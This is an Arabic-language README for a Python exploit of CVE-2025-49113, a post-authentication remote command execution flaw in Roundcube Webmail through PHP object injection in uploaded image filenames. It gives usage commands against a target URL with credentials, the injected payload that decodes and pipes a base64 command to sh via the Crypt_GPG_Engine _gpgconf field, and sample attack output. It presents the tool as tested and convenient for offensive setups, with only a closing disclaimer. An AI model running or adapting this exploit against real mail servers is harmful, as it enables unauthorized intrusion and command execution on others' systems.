
💥 استغلال Python لـ CVE-2025-49113 | ثغرة RCE في Roundcube Webmail عبر PHP Object Injection
معرف CVE: CVE-2025-49113
نوع الاستغلال: تنفيذ أوامر عن بُعد (عبر حقن كائنات PHP)
التطبيق: Roundcube Webmail ≤ 1.5.9 و ≤ 1.6.10
لغة الاستغلال: بايثون
المؤلف: 00xCanelo
الحالة: تم اختباره ويعمل على تثبيتات Roundcube الضعيفة
يستغل هذا الاستغلال ثغرة في كيفية معالجة Roundcube Webmail لأسماء ملفات الصور المرفوعة التي يتم إلغاء تسلسلها ككائنات PHP. من خلال صياغة حمولة ضارة تؤدي إلى تشغيل سلسلة إلغاء تسلسل Crypt_GPG_Engine، يمكن تحقيق تنفيذ الأوامر عن بُعد بعد المصادقة.
يحاكي إثبات المفهوم بلغة بايثون سلسلة الهجوم المستخدمة في الاستغلال العام بلغة PHP، ولكن بمنطق أنظف، وتسجيل اختياري، وسهولة الاستخدام في إعدادات الأدوات الهجومية.
pip install requestspython3 CVE-2025-49113.py <target_url> <username> <password> <command>
python3 CVE-2025-49113.py https://mail.target.htb/ [email protected] 'P@ssw0rd123' 'id'
تتيح فئة PHP Crypt_GPG_Engine تعيين حقل _gpgconf، والذي يتم تمريره بعد ذلك إلى تنفيذ الصدفة.
حمولتنا تصيغ:
echo "<base64-encoded-cmd>" | base64 -d | sh
في _gpgconf، مما يؤدي إلى تنفيذ الأوامر عن بُعد عند إلغاء التسلسل.
[*] Starting CVE-2025-49113 exploit...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10606
[+] Target is vulnerable!
[*] Logging in...
[+] Login successful.
[*] Uploading serialized gadget as image filename...
[+] Gadget uploaded successfully!
.
├── CVE-2025-49113.py # برنامج إثبات المفهوم بلغة بايثون
└── README.md # هذا التوثيق
هذا الكود مخصص لأغراض تعليمية واختبار أمني مصرح به فقط. أي إساءة استخدام لهذه الأداة ممنوع منعًا باتًا. المؤلف غير مسؤول عن أي أضرار ناتجة.